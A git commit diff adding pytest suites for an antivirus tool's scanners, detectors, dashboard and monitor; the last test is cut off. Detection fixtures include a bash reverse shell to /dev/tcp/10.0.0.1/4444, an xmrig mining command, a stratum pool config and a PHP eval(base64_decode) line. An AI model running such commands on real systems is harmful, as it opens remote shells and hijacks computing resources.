remove infra.md.example, infra.md is the source of truth

This commit is contained in:
Azreen Jamal
2026-03-03 03:06:13 +08:00
parent 1ad3033cc1
commit a3c6d09350
86 changed files with 17093 additions and 39 deletions

View File

View File

@@ -0,0 +1,88 @@
"""Tests for CLI commands using Click CliRunner."""
import pytest
from click.testing import CliRunner
from ayn_antivirus.cli import main
@pytest.fixture
def runner():
return CliRunner()
def test_help(runner):
result = runner.invoke(main, ["--help"])
assert result.exit_code == 0
assert "AYN Antivirus" in result.output or "scan" in result.output
def test_version(runner):
result = runner.invoke(main, ["--version"])
assert result.exit_code == 0
assert "1.0.0" in result.output
def test_scan_help(runner):
result = runner.invoke(main, ["scan", "--help"])
assert result.exit_code == 0
assert "--path" in result.output
def test_scan_containers_help(runner):
result = runner.invoke(main, ["scan-containers", "--help"])
assert result.exit_code == 0
assert "--runtime" in result.output
def test_dashboard_help(runner):
result = runner.invoke(main, ["dashboard", "--help"])
assert result.exit_code == 0
assert "--port" in result.output
def test_status(runner):
result = runner.invoke(main, ["status"])
assert result.exit_code == 0
def test_config_show(runner):
result = runner.invoke(main, ["config", "--show"])
assert result.exit_code == 0
def test_config_set_invalid_key(runner):
result = runner.invoke(main, ["config", "--set", "evil_key", "value"])
assert "Invalid config key" in result.output
def test_quarantine_list(runner):
# May fail with PermissionError on systems without /var/lib/ayn-antivirus
result = runner.invoke(main, ["quarantine", "list"])
# Accept exit code 0 (success) or 1 (permission denied on default path)
assert result.exit_code in (0, 1)
def test_update_help(runner):
result = runner.invoke(main, ["update", "--help"])
assert result.exit_code == 0
def test_fix_help(runner):
result = runner.invoke(main, ["fix", "--help"])
assert result.exit_code == 0
assert "--dry-run" in result.output
def test_report_help(runner):
result = runner.invoke(main, ["report", "--help"])
assert result.exit_code == 0
assert "--format" in result.output
def test_scan_processes_runs(runner):
result = runner.invoke(main, ["scan-processes"])
assert result.exit_code == 0
def test_scan_network_runs(runner):
result = runner.invoke(main, ["scan-network"])
assert result.exit_code == 0

View File

@@ -0,0 +1,88 @@
"""Tests for configuration loading and environment overrides."""
import pytest
from ayn_antivirus.config import Config
from ayn_antivirus.constants import DEFAULT_DASHBOARD_HOST, DEFAULT_DASHBOARD_PORT
def test_default_config():
c = Config()
assert c.dashboard_port == DEFAULT_DASHBOARD_PORT
assert c.dashboard_host == DEFAULT_DASHBOARD_HOST
assert c.auto_quarantine is False
assert c.enable_yara is True
assert c.enable_heuristics is True
assert isinstance(c.scan_paths, list)
assert isinstance(c.exclude_paths, list)
assert isinstance(c.api_keys, dict)
def test_config_env_port_host(monkeypatch):
monkeypatch.setenv("AYN_DASHBOARD_PORT", "9999")
monkeypatch.setenv("AYN_DASHBOARD_HOST", "127.0.0.1")
c = Config()
c._apply_env_overrides()
assert c.dashboard_port == 9999
assert c.dashboard_host == "127.0.0.1"
def test_config_env_auto_quarantine(monkeypatch):
monkeypatch.setenv("AYN_AUTO_QUARANTINE", "true")
c = Config()
c._apply_env_overrides()
assert c.auto_quarantine is True
def test_config_scan_path_env(monkeypatch):
monkeypatch.setenv("AYN_SCAN_PATH", "/tmp,/var")
c = Config()
c._apply_env_overrides()
assert "/tmp" in c.scan_paths
assert "/var" in c.scan_paths
def test_config_max_file_size_env(monkeypatch):
monkeypatch.setenv("AYN_MAX_FILE_SIZE", "12345")
c = Config()
c._apply_env_overrides()
assert c.max_file_size == 12345
def test_config_load_missing_file():
"""Loading from non-existent file returns defaults."""
c = Config.load("/nonexistent/path/config.yaml")
assert c.dashboard_port == DEFAULT_DASHBOARD_PORT
assert isinstance(c.scan_paths, list)
def test_config_load_yaml(tmp_path):
"""Loading a valid YAML config file picks up values."""
cfg_file = tmp_path / "config.yaml"
cfg_file.write_text(
"scan_paths:\n - /opt\nauto_quarantine: true\ndashboard_port: 8888\n"
)
c = Config.load(str(cfg_file))
assert c.scan_paths == ["/opt"]
assert c.auto_quarantine is True
assert c.dashboard_port == 8888
def test_config_env_overrides_yaml(tmp_path, monkeypatch):
"""Environment variables take precedence over YAML."""
cfg_file = tmp_path / "config.yaml"
cfg_file.write_text("dashboard_port: 1111\n")
monkeypatch.setenv("AYN_DASHBOARD_PORT", "2222")
c = Config.load(str(cfg_file))
assert c.dashboard_port == 2222
def test_all_fields_accessible():
"""Every expected config attribute exists."""
c = Config()
for attr in [
"scan_paths", "exclude_paths", "quarantine_path", "db_path",
"log_path", "auto_quarantine", "scan_schedule", "max_file_size",
"enable_yara", "enable_heuristics", "enable_realtime_monitor",
"dashboard_host", "dashboard_port", "dashboard_db_path", "api_keys",
]:
assert hasattr(c, attr), f"Missing config attribute: {attr}"

View File

@@ -0,0 +1,405 @@
"""Tests for the container scanner module."""
from __future__ import annotations
import json
from unittest.mock import patch
import pytest
from ayn_antivirus.scanners.container_scanner import (
ContainerInfo,
ContainerScanResult,
ContainerScanner,
ContainerThreat,
)
# ---------------------------------------------------------------------------
# Data class tests
# ---------------------------------------------------------------------------
class TestContainerInfo:
def test_defaults(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx",
status="running", runtime="docker", created="2026-01-01",
)
assert ci.ports == []
assert ci.mounts == []
assert ci.pid == 0
assert ci.ip_address == ""
assert ci.labels == {}
def test_to_dict(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx:1.25",
status="running", runtime="docker", created="2026-01-01",
ports=["80:80"], mounts=["/data"], pid=42,
ip_address="10.0.0.2", labels={"env": "prod"},
)
d = ci.to_dict()
assert d["container_id"] == "abc"
assert d["ports"] == ["80:80"]
assert d["labels"] == {"env": "prod"}
class TestContainerThreat:
def test_to_dict(self):
ct = ContainerThreat(
container_id="abc", container_name="web", runtime="docker",
threat_name="Miner.X", threat_type="miner",
severity="CRITICAL", details="found xmrig",
)
d = ct.to_dict()
assert d["threat_name"] == "Miner.X"
assert d["severity"] == "CRITICAL"
assert len(d["timestamp"]) == 19
def test_optional_fields(self):
ct = ContainerThreat(
container_id="x", container_name="y", runtime="podman",
threat_name="T", threat_type="malware", severity="HIGH",
details="d", file_path="/tmp/bad", process_name="evil",
)
d = ct.to_dict()
assert d["file_path"] == "/tmp/bad"
assert d["process_name"] == "evil"
class TestContainerScanResult:
def test_empty_is_clean(self):
r = ContainerScanResult(scan_id="t", start_time="2026-01-01 00:00:00")
assert r.is_clean is True
assert r.duration_seconds == 0.0
def test_with_threats(self):
ct = ContainerThreat(
container_id="a", container_name="b", runtime="docker",
threat_name="T", threat_type="miner", severity="HIGH",
details="d",
)
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:10",
threats=[ct],
)
assert r.is_clean is False
assert r.duration_seconds == 10.0
def test_to_dict(self):
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:03",
containers_found=2,
containers_scanned=1,
errors=["oops"],
)
d = r.to_dict()
assert d["threats_found"] == 0
assert d["duration_seconds"] == 3.0
assert d["errors"] == ["oops"]
# ---------------------------------------------------------------------------
# Scanner tests
# ---------------------------------------------------------------------------
class TestContainerScanner:
def test_properties(self):
s = ContainerScanner()
assert s.name == "container_scanner"
assert "Docker" in s.description
assert isinstance(s.available_runtimes, list)
def test_no_runtimes_graceful(self):
"""With no runtimes installed scan returns an error, not an exception."""
s = ContainerScanner()
s._available_runtimes = []
s._docker_cmd = None
s._podman_cmd = None
s._lxc_cmd = None
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.containers_found == 0
assert len(r.errors) == 1
assert "No container runtimes" in r.errors[0]
def test_scan_returns_result(self):
s = ContainerScanner()
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.scan_id
assert r.start_time
assert r.end_time
def test_scan_container_delegates(self):
s = ContainerScanner()
s._available_runtimes = []
r = s.scan_container("some-id")
assert isinstance(r, ContainerScanResult)
def test_run_cmd_timeout(self):
_, stderr, rc = ContainerScanner._run_cmd(["sleep", "10"], timeout=1)
assert rc == -1
assert "timed out" in stderr.lower()
def test_run_cmd_not_found(self):
_, stderr, rc = ContainerScanner._run_cmd(
["this_command_does_not_exist_xyz"],
)
assert rc == -1
assert "not found" in stderr.lower() or "No such file" in stderr
def test_find_command(self):
# python3 should exist everywhere
assert ContainerScanner._find_command("python3") is not None
assert ContainerScanner._find_command("no_such_binary_xyz") is None
# ---------------------------------------------------------------------------
# Mock-based integration tests
# ---------------------------------------------------------------------------
class TestDockerParsing:
"""Test Docker output parsing with mocked subprocess calls."""
def _make_scanner(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
s._available_runtimes = ["docker"]
return s
def test_list_docker_parses_output(self):
ps_output = (
"abc123456789\tweb\tnginx:1.25\tUp 2 hours\t"
"2026-01-01 00:00:00\t0.0.0.0:80->80/tcp"
)
inspect_output = json.dumps([{
"State": {"Pid": 42},
"NetworkSettings": {"Networks": {"bridge": {"IPAddress": "172.17.0.2"}}},
"Mounts": [{"Source": "/data"}],
"Config": {"Labels": {"app": "web"}},
}])
s = self._make_scanner()
with patch.object(s, "_run_cmd") as mock_run:
mock_run.side_effect = [
(ps_output, "", 0), # docker ps
(inspect_output, "", 0), # docker inspect
]
containers = s._list_docker()
assert len(containers) == 1
c = containers[0]
assert c.name == "web"
assert c.image == "nginx:1.25"
assert c.status == "running"
assert c.runtime == "docker"
assert c.pid == 42
assert c.ip_address == "172.17.0.2"
assert "/data" in c.mounts
assert c.labels == {"app": "web"}
def test_list_docker_ps_failure(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("", "error", 1)):
assert s._list_docker() == []
def test_inspect_docker_bad_json(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("not json", "", 0)):
assert s._inspect_docker("abc") == {}
class TestPodmanParsing:
def test_list_podman_parses_json(self):
s = ContainerScanner()
s._podman_cmd = "/usr/bin/podman"
s._available_runtimes = ["podman"]
podman_output = json.dumps([{
"Id": "def456789012abcdef",
"Names": ["db"],
"Image": "postgres:16",
"State": "running",
"Created": "2026-01-01",
"Ports": [{"hostPort": 5432, "containerPort": 5432}],
"Pid": 99,
"Labels": {},
}])
with patch.object(s, "_run_cmd", return_value=(podman_output, "", 0)):
containers = s._list_podman()
assert len(containers) == 1
assert containers[0].name == "db"
assert containers[0].runtime == "podman"
assert containers[0].pid == 99
class TestLXCParsing:
def test_list_lxc_parses_output(self):
s = ContainerScanner()
s._lxc_cmd = "/usr/bin/lxc-ls"
s._available_runtimes = ["lxc"]
lxc_output = "NAME STATE IPV4 PID\ntest1 RUNNING 10.0.3.5 1234"
with patch.object(s, "_run_cmd", return_value=(lxc_output, "", 0)):
containers = s._list_lxc()
assert len(containers) == 1
assert containers[0].name == "test1"
assert containers[0].status == "running"
assert containers[0].ip_address == "10.0.3.5"
assert containers[0].pid == 1234
class TestMisconfigDetection:
"""Test misconfiguration detection with mocked inspect output."""
def _scan_misconfig(self, inspect_data):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
with patch.object(s, "_run_cmd", return_value=(json.dumps([inspect_data]), "", 0)):
return s._check_misconfigurations(ci)
def test_privileged_mode(self):
threats = self._scan_misconfig({
"HostConfig": {"Privileged": True},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "PrivilegedMode.Container" in names
def test_root_user(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": ""},
})
names = [t.threat_name for t in threats]
assert "RunAsRoot.Container" in names
def test_host_network(self):
threats = self._scan_misconfig({
"HostConfig": {"NetworkMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostNetwork.Container" in names
def test_host_pid(self):
threats = self._scan_misconfig({
"HostConfig": {"PidMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostPID.Container" in names
def test_dangerous_caps(self):
threats = self._scan_misconfig({
"HostConfig": {"CapAdd": ["SYS_ADMIN", "NET_RAW"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "DangerousCap.Container.SYS_ADMIN" in names
assert "DangerousCap.Container.NET_RAW" in names
def test_sensitive_mount(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": "app"},
"Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
})
names = [t.threat_name for t in threats]
assert "SensitiveMount.Container" in names
def test_no_resource_limits(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 0, "CpuQuota": 0},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "NoResourceLimits.Container" in names
def test_security_disabled(self):
threats = self._scan_misconfig({
"HostConfig": {"SecurityOpt": ["seccomp=unconfined"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "SecurityDisabled.Container" in names
def test_clean_config(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 512000000, "CpuQuota": 50000},
"Config": {"User": "app"},
})
# Should have no misconfig threats
assert len(threats) == 0
class TestImageCheck:
def test_latest_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:latest",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_no_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_pinned_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:1.25.3",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert len(threats) == 0
class TestProcessDetection:
def _make_scanner_and_container(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
return s, ci
def test_miner_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 95.0 8.0 123456 65432 ? Sl 00:00 1:23 /usr/bin/xmrig --pool pool.example.com"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("CryptoMiner" in n for n in names)
def test_reverse_shell_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 0.1 0.0 1234 432 ? S 00:00 0:00 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("ReverseShell" in n for n in names)
def test_stopped_container_skipped(self):
s, ci = self._make_scanner_and_container()
ci.status = "stopped"
# _get_exec_prefix returns None for stopped containers
threats = s._check_processes(ci)
assert threats == []

View File

@@ -0,0 +1,119 @@
"""Tests for dashboard API endpoints."""
import pytest
from aiohttp import web
from ayn_antivirus.dashboard.api import setup_routes, _safe_int
from ayn_antivirus.dashboard.store import DashboardStore
from ayn_antivirus.dashboard.collector import MetricsCollector
@pytest.fixture
def store(tmp_path):
s = DashboardStore(str(tmp_path / "test_api.db"))
yield s
s.close()
@pytest.fixture
def app(store, tmp_path):
application = web.Application()
application["store"] = store
application["collector"] = MetricsCollector(store, interval=9999)
from ayn_antivirus.config import Config
cfg = Config()
cfg.db_path = str(tmp_path / "sigs.db")
application["config"] = cfg
setup_routes(application)
return application
# ------------------------------------------------------------------
# _safe_int unit tests
# ------------------------------------------------------------------
def test_safe_int_valid():
assert _safe_int("50", 10) == 50
assert _safe_int("0", 10, min_val=1) == 1
assert _safe_int("9999", 10, max_val=100) == 100
def test_safe_int_invalid():
assert _safe_int("abc", 10) == 10
assert _safe_int("", 10) == 10
assert _safe_int(None, 10) == 10
# ------------------------------------------------------------------
# API endpoint tests (async, require aiohttp_client)
# ------------------------------------------------------------------
@pytest.mark.asyncio
async def test_health_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/health")
assert resp.status == 200
data = await resp.json()
assert "cpu_percent" in data
@pytest.mark.asyncio
async def test_status_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/status")
assert resp.status == 200
data = await resp.json()
assert "hostname" in data
@pytest.mark.asyncio
async def test_threats_endpoint(app, store, aiohttp_client):
store.record_threat("/tmp/evil", "TestVirus", "malware", "HIGH")
client = await aiohttp_client(app)
resp = await client.get("/api/threats")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_scans_endpoint(app, store, aiohttp_client):
store.record_scan("quick", "/tmp", 100, 5, 0, 2.5)
client = await aiohttp_client(app)
resp = await client.get("/api/scans")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_logs_endpoint(app, store, aiohttp_client):
store.log_activity("Test log", "INFO", "test")
client = await aiohttp_client(app)
resp = await client.get("/api/logs")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_containers_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/containers")
assert resp.status == 200
data = await resp.json()
assert "runtimes" in data
@pytest.mark.asyncio
async def test_definitions_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/definitions")
assert resp.status == 200
data = await resp.json()
assert "total_hashes" in data
@pytest.mark.asyncio
async def test_invalid_query_params(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/threats?limit=abc")
assert resp.status == 200 # Should not crash, uses default

View File

@@ -0,0 +1,148 @@
"""Tests for dashboard store."""
import threading
import pytest
from ayn_antivirus.dashboard.store import DashboardStore
@pytest.fixture
def store(tmp_path):
s = DashboardStore(str(tmp_path / "test_dashboard.db"))
yield s
s.close()
def test_record_and_get_metrics(store):
store.record_metric(
cpu=50.0, mem_pct=60.0, mem_used=4000, mem_total=8000,
disk_usage=[{"mount": "/", "percent": 50}],
load_avg=[1.0, 0.5, 0.3], net_conns=10,
)
latest = store.get_latest_metrics()
assert latest is not None
assert latest["cpu_percent"] == 50.0
assert latest["mem_percent"] == 60.0
assert latest["disk_usage"] == [{"mount": "/", "percent": 50}]
assert latest["load_avg"] == [1.0, 0.5, 0.3]
def test_record_and_get_threats(store):
store.record_threat(
"/tmp/evil", "TestVirus", "malware", "HIGH",
"test_det", "abc", "quarantined", "test detail",
)
threats = store.get_recent_threats(10)
assert len(threats) == 1
assert threats[0]["threat_name"] == "TestVirus"
assert threats[0]["action_taken"] == "quarantined"
def test_threat_stats(store):
store.record_threat("/a", "V1", "malware", "CRITICAL", "d", "", "detected", "")
store.record_threat("/b", "V2", "miner", "HIGH", "d", "", "killed", "")
store.record_threat("/c", "V3", "spyware", "MEDIUM", "d", "", "detected", "")
stats = store.get_threat_stats()
assert stats["total"] == 3
assert stats["by_severity"]["CRITICAL"] == 1
assert stats["by_severity"]["HIGH"] == 1
assert stats["by_severity"]["MEDIUM"] == 1
assert stats["last_24h"] == 3
assert stats["last_7d"] == 3
def test_record_and_get_scans(store):
store.record_scan("full", "/", 1000, 50, 2, 10.5)
scans = store.get_recent_scans(10)
assert len(scans) == 1
assert scans[0]["files_scanned"] == 1000
assert scans[0]["scan_type"] == "full"
assert scans[0]["status"] == "completed"
def test_scan_chart_data(store):
store.record_scan("full", "/", 100, 5, 1, 5.0)
data = store.get_scan_chart_data(30)
assert len(data) >= 1
row = data[0]
assert "day" in row
assert "scans" in row
assert "threats" in row
def test_sig_updates(store):
store.record_sig_update("malwarebazaar", hashes=100, ips=50, domains=20, urls=10)
updates = store.get_recent_sig_updates(10)
assert len(updates) == 1
assert updates[0]["feed_name"] == "malwarebazaar"
stats = store.get_sig_stats()
assert stats["total_hashes"] == 100
assert stats["total_ips"] == 50
assert stats["total_domains"] == 20
assert stats["total_urls"] == 10
def test_activity_log(store):
store.log_activity("Test message", "INFO", "test")
logs = store.get_recent_logs(10)
assert len(logs) == 1
assert logs[0]["message"] == "Test message"
assert logs[0]["level"] == "INFO"
assert logs[0]["source"] == "test"
def test_metrics_history(store):
store.record_metric(
cpu=10, mem_pct=20, mem_used=1000, mem_total=8000,
disk_usage=[], load_avg=[0.1], net_conns=5,
)
store.record_metric(
cpu=20, mem_pct=30, mem_used=2000, mem_total=8000,
disk_usage=[], load_avg=[0.2], net_conns=10,
)
history = store.get_metrics_history(hours=1)
assert len(history) == 2
assert history[0]["cpu_percent"] == 10
assert history[1]["cpu_percent"] == 20
def test_cleanup_retains_fresh(store):
"""Cleanup with 0 hours should not delete just-inserted metrics."""
store.record_metric(
cpu=10, mem_pct=20, mem_used=1000, mem_total=8000,
disk_usage=[], load_avg=[], net_conns=0,
)
store.cleanup_old_metrics(hours=0)
assert store.get_latest_metrics() is not None
def test_empty_store_returns_none(store):
"""Empty store returns None / empty lists gracefully."""
assert store.get_latest_metrics() is None
assert store.get_recent_threats(10) == []
assert store.get_recent_scans(10) == []
assert store.get_recent_logs(10) == []
stats = store.get_threat_stats()
assert stats["total"] == 0
def test_thread_safety(store):
"""Concurrent writes from multiple threads should not crash."""
errors = []
def writer(n):
try:
for i in range(10):
store.record_metric(
cpu=float(n * 10 + i), mem_pct=50, mem_used=4000,
mem_total=8000, disk_usage=[], load_avg=[], net_conns=0,
)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=writer, args=(i,)) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert len(errors) == 0

View File

@@ -0,0 +1,48 @@
import os
import tempfile
import pytest
def test_heuristic_detector_import():
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
detector = HeuristicDetector()
assert detector is not None
def test_heuristic_suspicious_strings(tmp_path):
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
malicious = tmp_path / "evil.php"
malicious.write_text("<?php eval(base64_decode('ZXZpbCBjb2Rl')); ?>")
detector = HeuristicDetector()
results = detector.detect(str(malicious))
assert len(results) > 0
def test_cryptominer_detector_import():
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
detector = CryptominerDetector()
assert detector is not None
def test_cryptominer_stratum_detection(tmp_path):
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
miner_config = tmp_path / "config.json"
miner_config.write_text('{"url": "stratum+tcp://pool.minexmr.com:4444", "user": "wallet123"}')
detector = CryptominerDetector()
results = detector.detect(str(miner_config))
assert len(results) > 0
def test_spyware_detector_import():
from ayn_antivirus.detectors.spyware_detector import SpywareDetector
detector = SpywareDetector()
assert detector is not None
def test_rootkit_detector_import():
from ayn_antivirus.detectors.rootkit_detector import RootkitDetector
detector = RootkitDetector()
assert detector is not None
def test_signature_detector_import():
from ayn_antivirus.detectors.signature_detector import SignatureDetector
assert SignatureDetector is not None
def test_yara_detector_graceful():
from ayn_antivirus.detectors.yara_detector import YaraDetector
detector = YaraDetector()
assert detector is not None

View File

@@ -0,0 +1,61 @@
import os
import tempfile
import pytest
from datetime import datetime
from ayn_antivirus.core.engine import (
ThreatType, Severity, ScanType, ThreatInfo,
ScanResult, FileScanResult, ScanEngine
)
from ayn_antivirus.core.event_bus import EventBus, EventType
def test_threat_type_enum():
assert ThreatType.VIRUS.value is not None
assert ThreatType.MINER.value is not None
def test_severity_enum():
assert Severity.CRITICAL.value is not None
assert Severity.LOW.value is not None
def test_threat_info_creation():
threat = ThreatInfo(
path="/tmp/evil.sh",
threat_name="TestMalware",
threat_type=ThreatType.MALWARE,
severity=Severity.HIGH,
detector_name="test",
details="Test detection",
file_hash="abc123"
)
assert threat.path == "/tmp/evil.sh"
assert threat.threat_type == ThreatType.MALWARE
def test_scan_result_creation():
result = ScanResult(
scan_id="test-123",
start_time=datetime.now(),
end_time=datetime.now(),
files_scanned=100,
files_skipped=5,
threats=[],
scan_path="/tmp",
scan_type=ScanType.QUICK
)
assert result.files_scanned == 100
assert len(result.threats) == 0
def test_event_bus():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: received.append(data))
bus.publish(EventType.THREAT_FOUND, {"test": True})
assert len(received) == 1
assert received[0]["test"] == True
def test_scan_clean_file(tmp_path):
clean_file = tmp_path / "clean.txt"
clean_file.write_text("This is a perfectly normal text file with nothing suspicious.")
from ayn_antivirus.config import Config
config = Config()
engine = ScanEngine(config)
result = engine.scan_file(str(clean_file))
assert isinstance(result, FileScanResult)

View File

@@ -0,0 +1,117 @@
"""Tests for the event bus pub/sub system."""
import pytest
from ayn_antivirus.core.event_bus import EventBus, EventType
def test_subscribe_and_publish():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: received.append(data))
bus.publish(EventType.THREAT_FOUND, {"test": True})
assert len(received) == 1
assert received[0]["test"] is True
def test_multiple_subscribers():
bus = EventBus()
r1, r2 = [], []
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r1.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r2.append(d))
bus.publish(EventType.SCAN_STARTED, "go")
assert len(r1) == 1
assert len(r2) == 1
def test_unsubscribe():
bus = EventBus()
received = []
cb = lambda et, d: received.append(d)
bus.subscribe(EventType.FILE_SCANNED, cb)
bus.unsubscribe(EventType.FILE_SCANNED, cb)
bus.publish(EventType.FILE_SCANNED, "data")
assert len(received) == 0
def test_unsubscribe_nonexistent():
"""Unsubscribing a callback that was never registered should not crash."""
bus = EventBus()
bus.unsubscribe(EventType.FILE_SCANNED, lambda et, d: None)
def test_publish_no_subscribers():
"""Publishing with no subscribers should not crash."""
bus = EventBus()
bus.publish(EventType.SCAN_COMPLETED, "no crash")
def test_subscriber_exception_isolated():
"""A failing subscriber must not prevent other subscribers from running."""
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: 1 / 0) # will raise
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: received.append(d))
bus.publish(EventType.THREAT_FOUND, "data")
assert len(received) == 1
def test_all_event_types():
"""Every EventType value can be published without error."""
bus = EventBus()
for et in EventType:
bus.publish(et, None)
def test_clear_all():
bus = EventBus()
received = []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: received.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: received.append(d))
bus.clear()
bus.publish(EventType.THREAT_FOUND, "a")
bus.publish(EventType.SCAN_STARTED, "b")
assert len(received) == 0
def test_clear_single_event():
bus = EventBus()
r1, r2 = [], []
bus.subscribe(EventType.THREAT_FOUND, lambda et, d: r1.append(d))
bus.subscribe(EventType.SCAN_STARTED, lambda et, d: r2.append(d))
bus.clear(EventType.THREAT_FOUND)
bus.publish(EventType.THREAT_FOUND, "a")
bus.publish(EventType.SCAN_STARTED, "b")
assert len(r1) == 0 # cleared
assert len(r2) == 1 # still active
def test_callback_receives_event_type():
"""Callback receives (event_type, data) — verify event_type is correct."""
bus = EventBus()
calls = []
bus.subscribe(EventType.QUARANTINE_ACTION, lambda et, d: calls.append((et, d)))
bus.publish(EventType.QUARANTINE_ACTION, "payload")
assert calls[0][0] is EventType.QUARANTINE_ACTION
assert calls[0][1] == "payload"
def test_duplicate_subscribe():
"""Subscribing the same callback twice should only register it once."""
bus = EventBus()
received = []
cb = lambda et, d: received.append(d)
bus.subscribe(EventType.SCAN_COMPLETED, cb)
bus.subscribe(EventType.SCAN_COMPLETED, cb)
bus.publish(EventType.SCAN_COMPLETED, "x")
assert len(received) == 1
def test_event_type_values():
"""All expected event types exist."""
expected = {
"THREAT_FOUND", "SCAN_STARTED", "SCAN_COMPLETED", "FILE_SCANNED",
"SIGNATURE_UPDATED", "QUARANTINE_ACTION", "REMEDIATION_ACTION",
"DASHBOARD_METRIC",
}
actual = {et.name for et in EventType}
assert expected == actual

View File

@@ -0,0 +1,95 @@
"""Tests for real-time monitor."""
import pytest
import time
from ayn_antivirus.monitor.realtime import RealtimeMonitor
from ayn_antivirus.core.engine import ScanEngine
from ayn_antivirus.config import Config
@pytest.fixture
def monitor(tmp_path):
config = Config()
engine = ScanEngine(config)
m = RealtimeMonitor(config, engine)
yield m
if m.is_running:
m.stop()
def test_monitor_init(monitor):
assert monitor is not None
assert monitor.is_running is False
def test_monitor_should_skip():
"""Temporary / lock / editor files should be skipped."""
config = Config()
engine = ScanEngine(config)
m = RealtimeMonitor(config, engine)
assert m._should_skip("/tmp/test.tmp") is True
assert m._should_skip("/tmp/test.swp") is True
assert m._should_skip("/tmp/test.lock") is True
assert m._should_skip("/tmp/.#backup") is True
assert m._should_skip("/tmp/test.part") is True
assert m._should_skip("/tmp/test.txt") is False
assert m._should_skip("/tmp/test.py") is False
assert m._should_skip("/var/www/index.html") is False
def test_monitor_debounce(monitor):
"""After the first call records the path, an immediate repeat is debounced."""
import time as _time
# Prime the path so it's recorded with the current monotonic time.
# On fresh processes, monotonic() can be close to 0.0 which is the
# default in _recent, so we explicitly set a realistic timestamp.
monitor._recent["/tmp/test.txt"] = _time.monotonic() - 10
assert monitor._is_debounced("/tmp/test.txt") is False
# Immediate second call should be debounced (within 2s window)
assert monitor._is_debounced("/tmp/test.txt") is True
def test_monitor_debounce_different_paths(monitor):
"""Different paths should not debounce each other."""
import time as _time
# Prime both paths far enough in the past to avoid the initial-value edge case
past = _time.monotonic() - 10
monitor._recent["/tmp/a.txt"] = past
monitor._recent["/tmp/b.txt"] = past
assert monitor._is_debounced("/tmp/a.txt") is False
assert monitor._is_debounced("/tmp/b.txt") is False
def test_monitor_start_stop(tmp_path, monitor):
monitor.start(paths=[str(tmp_path)], recursive=True)
assert monitor.is_running is True
time.sleep(0.3)
monitor.stop()
assert monitor.is_running is False
def test_monitor_double_start(tmp_path, monitor):
"""Starting twice should be harmless."""
